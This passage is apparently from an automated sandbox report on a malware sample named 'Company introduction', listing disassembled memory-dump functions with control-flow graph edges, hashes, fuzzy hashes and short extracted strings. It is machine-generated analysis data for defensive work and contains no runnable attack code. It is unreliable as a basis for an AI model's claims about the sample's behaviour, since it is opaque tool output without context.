                                                                                                                                                    • Opcode Fuzzy Hash: 8061feecf956320baed7264183743a359afb47274b7d26a92e2a7eabc6b77977
                                                                                                                                                    • Instruction Fuzzy Hash: 1281B674E00258CFDB18DFAAD984A9DFBF2BF89300F148069E859AB365DB345985CF50
                                                                                                                                                    Function 017DCA08 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2777 17dca08-17dca38 2779 17dca3f-17dcb1c call 17d41a0 call 17d3cc0 2777->2779 2780 17dca3a 2777->2780 2790 17dcb1e 2779->2790 2791 17dcb23-17dcb44 call 17d5658 2779->2791 2780->2779 2790->2791 2793 17dcb49-17dcb54 2791->2793 2794 17dcb5b-17dcb5f 2793->2794 2795 17dcb56 2793->2795 2796 17dcb64-17dcb6b 2794->2796 2797 17dcb61-17dcb62 2794->2797 2795->2794 2799 17dcb6d 2796->2799 2800 17dcb72-17dcb80 2796->2800 2798 17dcb83-17dcbc7 2797->2798 2804 17dcc2d-17dcc44 2798->2804 2799->2800 2800->2798 2806 17dcbc9-17dcbdf 2804->2806 2807 17dcc46-17dcc6b 2804->2807 2811 17dcc09 2806->2811 2812 17dcbe1-17dcbed 2806->2812 2813 17dcc6d-17dcc82 2807->2813 2814 17dcc83 2807->2814 2817 17dcc0f-17dcc2c 2811->2817 2815 17dcbef-17dcbf5 2812->2815 2816 17dcbf7-17dcbfd 2812->2816 2813->2814 2818 17dcc07 2815->2818 2816->2818 2817->2804 2818->2817
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: c5f4a1e8e4f38c274ec12857d03db5c37621d1f3fc26fd7e9176bb556c54e853
                                                                                                                                                    • Instruction ID: 8c694ab8da3166d1b6f2f64d8956f291c631732bced582c60975f00aae3243d5
                                                                                                                                                    • Opcode Fuzzy Hash: c5f4a1e8e4f38c274ec12857d03db5c37621d1f3fc26fd7e9176bb556c54e853
                                                                                                                                                    • Instruction Fuzzy Hash: B681A274E00218CFDB19DFAAD984A9DFBF2BF89300F148069E419AB365DB309985CF51
                                                                                                                                                    Function 017DCCD8 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2822 17dccd8-17dcd08 2823 17dcd0f-17dcdec call 17d41a0 call 17d3cc0 2822->2823 2824 17dcd0a 2822->2824 2834 17dcdee 2823->2834 2835 17dcdf3-17dce14 call 17d5658 2823->2835 2824->2823 2834->2835 2837 17dce19-17dce24 2835->2837 2838 17dce2b-17dce2f 2837->2838 2839 17dce26 2837->2839 2840 17dce34-17dce3b 2838->2840 2841 17dce31-17dce32 2838->2841 2839->2838 2843 17dce3d 2840->2843 2844 17dce42-17dce50 2840->2844 2842 17dce53-17dce97 2841->2842 2848 17dcefd-17dcf14 2842->2848 2843->2844 2844->2842 2850 17dce99-17dceaf 2848->2850 2851 17dcf16-17dcf3b 2848->2851 2855 17dced9 2850->2855 2856 17dceb1-17dcebd 2850->2856 2857 17dcf3d-17dcf52 2851->2857 2858 17dcf53 2851->2858 2861 17dcedf-17dcefc 2855->2861 2859 17dcebf-17dcec5 2856->2859 2860 17dcec7-17dcecd 2856->2860 2857->2858 2862 17dced7 2859->2862 2860->2862 2861->2848 2862->2861
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: 00977e2f1461b20ce3addac914b186b29e1cf83b1c32061469ba95f8ab475c6b
                                                                                                                                                    • Instruction ID: b0952788619b8bc846596f7c49f7447664d837e9e56b0370d77c25cf1fa55824
                                                                                                                                                    • Opcode Fuzzy Hash: 00977e2f1461b20ce3addac914b186b29e1cf83b1c32061469ba95f8ab475c6b
                                                                                                                                                    • Instruction Fuzzy Hash: D681A374E002588FDB19DFAAD984A9DFBF2BF89300F14C0A9E419AB365DB305985CF51
                                                                                                                                                    Function 017DCFAA Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2866 17dcfaa-17dcfd8 2867 17dcfdf-17dd0bc call 17d41a0 call 17d3cc0 2866->2867 2868 17dcfda 2866->2868 2878 17dd0be 2867->2878 2879 17dd0c3-17dd0e4 call 17d5658 2867->2879 2868->2867 2878->2879 2881 17dd0e9-17dd0f4 2879->2881 2882 17dd0fb-17dd0ff 2881->2882 2883 17dd0f6 2881->2883 2884 17dd104-17dd10b 2882->2884 2885 17dd101-17dd102 2882->2885 2883->2882 2887 17dd10d 2884->2887 2888 17dd112-17dd120 2884->2888 2886 17dd123-17dd167 2885->2886 2892 17dd1cd-17dd1e4 2886->2892 2887->2888 2888->2886 2894 17dd169-17dd17f 2892->2894 2895 17dd1e6-17dd20b 2892->2895 2899 17dd1a9 2894->2899 2900 17dd181-17dd18d 2894->2900 2902 17dd20d-17dd222 2895->2902 2903 17dd223 2895->2903 2901 17dd1af-17dd1cc 2899->2901 2904 17dd18f-17dd195 2900->2904 2905 17dd197-17dd19d 2900->2905 2901->2892 2902->2903 2906 17dd1a7 2904->2906 2905->2906 2906->2901
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: daa01eee2a3d3e077a90a90b0f9dc9986560b0f5baf5cff2a0fb94a9ee98b143
                                                                                                                                                    • Instruction ID: ec2ea406ada9abba18f1b50bf1ac5b1bdac1c1b1b3fc51fd28943036db23e6cd
                                                                                                                                                    • Opcode Fuzzy Hash: daa01eee2a3d3e077a90a90b0f9dc9986560b0f5baf5cff2a0fb94a9ee98b143
                                                                                                                                                    • Instruction Fuzzy Hash: BD81B374E00218CFDB18DFAAD984A9DFBF2BF89310F148069E419AB365DB359985CF10
                                                                                                                                                    Function 017DC738 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: a1075035ddbf2eb157a97e3a51d978ee2890761ebbc908fbe257280b3e121261
                                                                                                                                                    • Instruction ID: 460b7ea2e067a557e4cffb0b6b6d1c18ef9e20c2fd7e97d45def26c50407e5f7
                                                                                                                                                    • Opcode Fuzzy Hash: a1075035ddbf2eb157a97e3a51d978ee2890761ebbc908fbe257280b3e121261
                                                                                                                                                    • Instruction Fuzzy Hash: 8981A474E00218CFDB19DFAAD984A9DFBF2BF89310F148069E419AB365DB345985CF50
                                                                                                                                                    Function 05A89328 Relevance: 1.8, APIs: 1, Instructions: 262libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2955296568.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_5a80000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 3da511391edbf7254aa3544e6e247139de815cd37af9403d803ca0e80e3b2ba0
                                                                                                                                                    • Instruction ID: 60f24393bdfc42b6914012da11c81756073671f6f5baffeb6ff640fd81519af7
                                                                                                                                                    • Opcode Fuzzy Hash: 3da511391edbf7254aa3544e6e247139de815cd37af9403d803ca0e80e3b2ba0
                                                                                                                                                    • Instruction Fuzzy Hash: 2191CF71E002198FCB19EFBAC954ABEBAF3BF88310F148569D416A7394DB349D05CB91
                                                                                                                                                    Function 017DE97A Relevance: .2, Instructions: 150COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0c264ab2a85384b832688a7b1e6dcabb31ffae46d962f8702ee25a8960198023
                                                                                                                                                    • Instruction ID: 1276f4cd5408d808af22cd49d844899ba22c84bbbc4a4b2a4c2ee60d01948351
                                                                                                                                                    • Opcode Fuzzy Hash: 0c264ab2a85384b832688a7b1e6dcabb31ffae46d962f8702ee25a8960198023
                                                                                                                                                    • Instruction Fuzzy Hash: E151D574E00208DFDB19DFAAD584A9DFBB2FF89300F248069E815AB364DB315946CF11
                                                                                                                                                    Function 017DE988 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a57b692daf8e8f9989abc0977ac65efd9ae6ae131f1514c70cbb54db7be6b076
                                                                                                                                                    • Instruction ID: 9cd3a30a440af262edd223d4d921203624ac63e4cad0aee1957d30a47769fbe9
                                                                                                                                                    • Opcode Fuzzy Hash: a57b692daf8e8f9989abc0977ac65efd9ae6ae131f1514c70cbb54db7be6b076
                                                                                                                                                    • Instruction Fuzzy Hash: 26519274E00208DFDB19DFAAD584A9DFBB2BF88300F248529E819AB364DB359945CF51
                                                                                                                                                    Function 017D76F1 Relevance: 10.5, Strings: 8, Instructions: 475COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 0 17d76f1-17d7725 1 17d772b-17d774e 0->1 2 17d7b54-17d7b58 0->2 11 17d77fc-17d7800 1->11 12 17d7754-17d7761 1->12 3 17d7b5a-17d7b6e 2->3 4 17d7b71-17d7b7f 2->4 9 17d7b81-17d7b96 4->9 10 17d7bf0-17d7c05 4->10 20 17d7b9d-17d7baa 9->20 21 17d7b98-17d7b9b 9->21 22 17d7c0c-17d7c19 10->22 23 17d7c07-17d7c0a 10->23 13 17d7848-17d7851 11->13 14 17d7802-17d7810 11->14 26 17d7770 12->26 27 17d7763-17d776e 12->27 17 17d7c67 13->17 18 17d7857-17d7861 13->18 14->13 32 17d7812-17d782d 14->32 33 17d7c6c-17d7c9c 17->33 18->2 24 17d7867-17d7870 18->24 28 17d7bac-17d7bed 20->28 21->28 29 17d7c1b-17d7c56 22->29 23->29 30 17d787f-17d788b 24->30 31 17d7872-17d7877 24->31 34 17d7772-17d7774 26->34 27->34 76 17d7c5d-17d7c64 29->76 30->33 39 17d7891-17d7897 30->39 31->30 60 17d782f-17d7839 32->60 61 17d783b 32->61 53 17d7c9e-17d7cb4 33->53 54 17d7cb5-17d7cbc 33->54 34->11 41 17d777a-17d77dc 34->41 42 17d789d-17d78ad 39->42 43 17d7b3e-17d7b42 39->43 88 17d77de 41->88 89 17d77e2-17d77f9 41->89 58 17d78af-17d78bf 42->58 59 17d78c1-17d78c3 42->59 43->17 47 17d7b48-17d7b4e 43->47 47->2 47->24 62 17d78c6-17d78cc 58->62 59->62 63 17d783d-17d783f 60->63 61->63 62->43 70 17d78d2-17d78e1 62->70 63->13 71 17d7841 63->71 72 17d798f-17d79ba call 17d7538 * 2 70->72 73 17d78e7 70->73 71->13 90 17d7aa4-17d7abe 72->90 91 17d79c0-17d79c4 72->91 74 17d78ea-17d78fb 73->74 74->33 78 17d7901-17d7913 74->78 78->33 81 17d7919-17d7931 78->81 144 17d7933 call 17d80c9 81->144 145 17d7933 call 17d80d8 81->145 84 17d7939-17d7949 84->43 87 17d794f-17d7952 84->87 92 17d795c-17d795f 87->92 93 17d7954-17d795a 87->93 88->89 89->11 90->2 113 17d7ac4-17d7ac8 90->113 91->43 94 17d79ca-17d79ce 91->94 92->17 95 17d7965-17d7968 92->95 93->92 93->95 98 17d79f6-17d79fc 94->98 99 17d79d0-17d79dd 94->99 100 17d796a-17d796e 95->100 101 17d7970-17d7973 95->101 103 17d79fe-17d7a02 98->103 104 17d7a37-17d7a3d 98->104 116 17d79ec 99->116 117 17d79df-17d79ea 99->117 100->101 102 17d7979-17d797d 100->102 101->17 101->102 102->17 110 17d7983-17d7989 102->110 103->104 105 17d7a04-17d7a0d 103->105 107 17d7a3f-17d7a43 104->107 108 17d7a49-17d7a4f 104->108 111 17d7a1c-17d7a32 105->111 112 17d7a0f-17d7a14 105->112 107->76 107->108 114 17d7a5b-17d7a5d 108->114 115 17d7a51-17d7a55 108->115 110->72 110->74 111->43 112->111 118 17d7aca-17d7ad4 call 17d63e0 113->118 119 17d7b04-17d7b08 113->119 120 17d7a5f-17d7a68 114->120 121 17d7a92-17d7a94 114->121 115->43 115->114 122 17d79ee-17d79f0 116->122 117->122 118->119 133 17d7ad6-17d7aeb 118->133 119->76 125 17d7b0e-17d7b12 119->125 128 17d7a6a-17d7a6f 120->128 129 17d7a77-17d7a8d 120->129 121->43 123 17d7a9a-17d7aa1 121->123 122->43 122->98 125->76 130 17d7b18-17d7b25 125->130 128->129 129->43 135 17d7b34 130->135 136 17d7b27-17d7b32 130->136 133->119 141 17d7aed-17d7b02 133->141 138 17d7b36-17d7b38 135->138 136->138 138->43 138->76 141->2 141->119 144->84 145->84
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                    • API String ID: 0-1932283790
                                                                                                                                                    • Opcode ID: 7339e004a5d9811a42389c1869d6f76adebb22040c4309f10e37e7e5c17d7588
                                                                                                                                                    • Instruction ID: 7f7cc3da098a527b57715d636066ff3db0e01b6aec7a3729ed346d750d7bb7f9
                                                                                                                                                    • Opcode Fuzzy Hash: 7339e004a5d9811a42389c1869d6f76adebb22040c4309f10e37e7e5c17d7588
                                                                                                                                                    • Instruction Fuzzy Hash: 8D124930A002498FCB19CF68D984AAEFBF2FF89318F1585A9E5599B361D730ED45CB50
                                                                                                                                                    Function 017D8490 Relevance: 3.2, Strings: 2, Instructions: 703COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1679 17d8490-17d897e 1754 17d8984-17d8994 1679->1754 1755 17d8ed0-17d8f05 1679->1755 1754->1755 1756 17d899a-17d89aa 1754->1756 1760 17d8f07-17d8f0c 1755->1760 1761 17d8f11-17d8f2f 1755->1761 1756->1755 1758 17d89b0-17d89c0 1756->1758 1758->1755 1759 17d89c6-17d89d6 1758->1759 1759->1755 1762 17d89dc-17d89ec 1759->1762 1763 17d8ff6-17d8ffb 1760->1763 1772 17d8fa6-17d8fb2 1761->1772 1773 17d8f31-17d8f3b 1761->1773 1762->1755 1764 17d89f2-17d8a02 1762->1764 1764->1755 1766 17d8a08-17d8a18 1764->1766 1766->1755 1768 17d8a1e-17d8a2e 1766->1768 1768->1755 1769 17d8a34-17d8a44 1768->1769 1769->1755 1771 17d8a4a-17d8a5a 1769->1771 1771->1755 1774 17d8a60-17d8ecf 1771->1774 1779 17d8fc9-17d8fd5 1772->1779 1780 17d8fb4-17d8fc0 1772->1780 1773->1772 1778 17d8f3d-17d8f49 1773->1778 1787 17d8f6e-17d8f71 1778->1787 1788 17d8f4b-17d8f56 1778->1788 1785 17d8fec-17d8fee 1779->1785 1786 17d8fd7-17d8fe3 1779->1786 1780->1779 1790 17d8fc2-17d8fc7 1780->1790 1785->1763 1786->1785 1799 17d8fe5-17d8fea 1786->1799 1791 17d8f88-17d8f94 1787->1791 1792 17d8f73-17d8f7f 1787->1792 1788->1787 1801 17d8f58-17d8f62 1788->1801 1790->1763 1794 17d8ffc-17d901e 1791->1794 1795 17d8f96-17d8f9d 1791->1795 1792->1791 1803 17d8f81-17d8f86 1792->1803 1805 17d902e 1794->1805 1806 17d9020 1794->1806 1795->1794 1800 17d8f9f-17d8fa4 1795->1800 1799->1763 1800->1763 1801->1787 1811 17d8f64-17d8f69 1801->1811 1803->1763 1810 17d9030-17d9031 1805->1810 1806->1805 1809 17d9027-17d902c 1806->1809 1809->1810 1811->1763
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $^q$$^q
                                                                                                                                                    • API String ID: 0-355816377
                                                                                                                                                    • Opcode ID: f833e799b9468276ea8b4dc0f1d6fc7b74ba773b0152c4e9d1f73f3463e446c1
                                                                                                                                                    • Instruction ID: a1d15fa3694deeb9ba202b6bfb0ec008cfbceb3383fe8048c7869559928d872f
                                                                                                                                                    • Opcode Fuzzy Hash: f833e799b9468276ea8b4dc0f1d6fc7b74ba773b0152c4e9d1f73f3463e446c1
                                                                                                                                                    • Instruction Fuzzy Hash: 40520E74A0021DCFEB149BA4C860BAEBB77FB94300F1481A9D11A6B3A5CF359D85DF52
                                                                                                                                                    Function 017D5F38 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2138 17d5f38-17d5f5a 2139 17d5f5c-17d5f60 2138->2139 2140 17d5f70-17d5f7b 2138->2140 2141 17d5f88-17d5f8f 2139->2141 2142 17d5f62-17d5f6e 2139->2142 2143 17d5f81-17d5f83 2140->2143 2144 17d6023-17d604f 2140->2144 2146 17d5faf-17d5fb8 2141->2146 2147 17d5f91-17d5f98 2141->2147 2142->2140 2142->2141 2145 17d601b-17d6020 2143->2145 2151 17d6056-17d60ae 2144->2151 2245 17d5fba call 17d5f38 2146->2245 2246 17d5fba call 17d5f2a 2146->2246 2147->2146 2148 17d5f9a-17d5fa5 2147->2148 2150 17d5fab-17d5fad 2148->2150 2148->2151 2150->2145 2170 17d60bd-17d60cf 2151->2170 2171 17d60b0-17d60b6 2151->2171 2152 17d5fc0-17d5fc2 2153 17d5fca-17d5fd2 2152->2153 2154 17d5fc4-17d5fc8 2152->2154 2158 17d5fd4-17d5fd9 2153->2158 2159 17d5fe1-17d5fe3 2153->2159 2154->2153 2157 17d5fe5-17d6004 call 17d69a0 2154->2157 2163 17d6019 2157->2163 2164 17d6006-17d600f 2157->2164 2158->2159 2159->2145 2163->2145 2239 17d6011 call 17dafad 2164->2239 2240 17d6011 call 17daeba 2164->2240 2241 17d6011 call 17daef0 2164->2241 2167 17d6017 2167->2145 2173 17d60d5-17d60d9 2170->2173 2174 17d6163-17d6165 2170->2174 2171->2170 2175 17d60e9-17d60f6 2173->2175 2176 17d60db-17d60e7 2173->2176 2242 17d6167 call 17d6300 2174->2242 2243 17d6167 call 17d62f0 2174->2243 2184 17d60f8-17d6102 2175->2184 2176->2184 2177 17d616d-17d6173 2178 17d617f-17d6186 2177->2178 2179 17d6175-17d617b 2177->2179 2182 17d617d 2179->2182 2183 17d61e1-17d6240 2179->2183 2182->2178 2197 17d6247-17d626b 2183->2197 2187 17d612f-17d6133 2184->2187 2188 17d6104-17d6113 2184->2188 2189 17d613f-17d6143 2187->2189 2190 17d6135-17d613b 2187->2190 2199 17d6115-17d611c 2188->2199 2200 17d6123-17d612d 2188->2200 2189->2178 2194 17d6145-17d6149 2189->2194 2192 17d613d 2190->2192 2193 17d6189-17d61da 2190->2193 2192->2178 2193->2183 2196 17d614f-17d6161 2194->2196 2194->2197 2196->2178 2207 17d626d-17d626f 2197->2207 2208 17d6271-17d6273 2197->2208 2199->2200 2200->2187 2209 17d62e9-17d62ec 2207->2209 2210 17d6275-17d6279 2208->2210 2211 17d6284-17d6286 2208->2211 2215 17d627f-17d6282 2210->2215 2216 17d627b-17d627d 2210->2216 2217 17d6299-17d629f 2211->2217 2218 17d6288-17d628c 2211->2218 2215->2209 2216->2209 2219 17d62ca-17d62cc 2217->2219 2220 17d62a1-17d62c8 2217->2220 2221 17d628e-17d6290 2218->2221 2222 17d6292-17d6297 2218->2222 2227 17d62d3-17d62d5 2219->2227 2220->2227 2221->2209 2222->2209 2229 17d62db-17d62dd 2227->2229 2230 17d62d7-17d62d9 2227->2230 2231 17d62df-17d62e4 2229->2231 2232 17d62e6 2229->2232 2230->2209 2231->2209 2232->2209 2239->2167 2240->2167 2241->2167 2242->2177 2243->2177 2245->2152 2246->2152
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Hbq$Hbq
                                                                                                                                                    • API String ID: 0-4258043069
                                                                                                                                                    • Opcode ID: 7f3f25ecdab8f1999d6da9bb7ac328577aa6f4b08709a877950233a3e1a9ee8a
                                                                                                                                                    • Instruction ID: 46b0cb078ba0d1c5cf2f0ae7e3d762f38c3e8a55a34334b10e93f91e24e63bf7
                                                                                                                                                    • Opcode Fuzzy Hash: 7f3f25ecdab8f1999d6da9bb7ac328577aa6f4b08709a877950233a3e1a9ee8a
                                                                                                                                                    • Instruction Fuzzy Hash: 85B1AE30704219CFDB169F38C854B6ABBB6AF89344F1489A9E946CB392DB35DC42C791
                                                                                                                                                    Function 017D6498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2499 17d6498-17d64a5 2500 17d64ad-17d64af 2499->2500 2501 17d64a7-17d64ab 2499->2501 2503 17d66c0-17d66c7 2500->2503 2501->2500 2502 17d64b4-17d64bf 2501->2502 2504 17d66c8 2502->2504 2505 17d64c5-17d64cc 2502->2505 2508 17d66cd-17d66e0 2504->2508 2506 17d6661-17d6667 2505->2506 2507 17d64d2-17d64e1 2505->2507 2510 17d666d-17d6671 2506->2510 2511 17d6669-17d666b 2506->2511 2507->2508 2509 17d64e7-17d64f6 2507->2509 2520 17d6718-17d671a 2508->2520 2521 17d66e2-17d6705 2508->2521 2517 17d64f8-17d64fb 2509->2517 2518 17d650b-17d650e 2509->2518 2512 17d66be 2510->2512 2513 17d6673-17d6679 2510->2513 2511->2503 2512->2503 2513->2504 2515 17d667b-17d667e 2513->2515 2515->2504 2519 17d6680-17d6695 2515->2519 2524 17d64fd-17d6500 2517->2524 2525 17d651a-17d6520 2517->2525 2518->2525 2526 17d6510-17d6513 2518->2526 2543 17d66b9-17d66bc 2519->2543 2544 17d6697-17d669d 2519->2544 2522 17d671c-17d672e 2520->2522 2523 17d672f-17d6736 2520->2523 2545 17d670e-17d6712 2521->2545 2546 17d6707-17d670c 2521->2546 2527 17d6506 2524->2527 2528 17d6601-17d6607 2524->2528 2533 17d6538-17d6555 2525->2533 2534 17d6522-17d6528 2525->2534 2529 17d6515 2526->2529 2530 17d6566-17d656c 2526->2530 2540 17d662c-17d6639 2527->2540 2538 17d661f-17d6629 2528->2538 2539 17d6609-17d660f 2528->2539 2529->2540 2541 17d656e-17d6574 2530->2541 2542 17d6584-17d6596 2530->2542 2573 17d655e-17d6561 2533->2573 2535 17d652c-17d6536 2534->2535 2536 17d652a 2534->2536 2535->2533 2536->2533 2538->2540 2549 17d6611 2539->2549 2550 17d6613-17d661d 2539->2550 2560 17d664d-17d664f 2540->2560 2561 17d663b-17d663f 2540->2561 2552 17d6578-17d6582 2541->2552 2553 17d6576 2541->2553 2562 17d6598-17d65a4 2542->2562 2563 17d65a6-17d65c9 2542->2563 2543->2503 2547 17d66af-17d66b2 2544->2547 2548 17d669f-17d66ad 2544->2548 2545->2520 2546->2520 2547->2504 2555 17d66b4-17d66b7 2547->2555 2548->2504 2548->2547 2549->2538 2550->2538 2552->2542 2553->2542 2555->2543 2555->2544 2568 17d6653-17d6656 2560->2568 2561->2560 2567 17d6641-17d6645 2561->2567 2574 17d65f1-17d65ff 2562->2574 2563->2504 2577 17d65cf-17d65d2 2563->2577 2567->2504 2569 17d664b 2567->2569 2568->2504 2570 17d6658-17d665b 2568->2570 2569->2568 2570->2506 2570->2507 2573->2540 2574->2540 2577->2504 2578 17d65d8-17d65ea 2577->2578 2578->2574
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ,bq$,bq
                                                                                                                                                    • API String ID: 0-2699258169
                                                                                                                                                    • Opcode ID: f773f787c23e41fcf95cbeecb3839eab8823d8c85c9691b6f31c6259e854b41c
                                                                                                                                                    • Instruction ID: a2cce88d9b5aad67c3e5badf356614e8434ff8a5b7a8ab9b960bd80fc07fb8b1
                                                                                                                                                    • Opcode Fuzzy Hash: f773f787c23e41fcf95cbeecb3839eab8823d8c85c9691b6f31c6259e854b41c
                                                                                                                                                    • Instruction Fuzzy Hash: 5E81AF70A00509CFCB14CF6DC48896AFFB2FF89310B2585A9E506EB365DB31E841CB61
                                                                                                                                                    Function 017DAEBA Relevance: 2.6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (o^q$(o^q
                                                                                                                                                    • API String ID: 0-1946778100
                                                                                                                                                    • Opcode ID: 64295229dc8851a0a680e449a7afe714803e735c0fe8340932d0a65740d754b2
                                                                                                                                                    • Instruction ID: 448ffffec9e778dca193760e2fbd1239ea8e262893bec6ad5ece2e796abcbc01
                                                                                                                                                    • Opcode Fuzzy Hash: 64295229dc8851a0a680e449a7afe714803e735c0fe8340932d0a65740d754b2
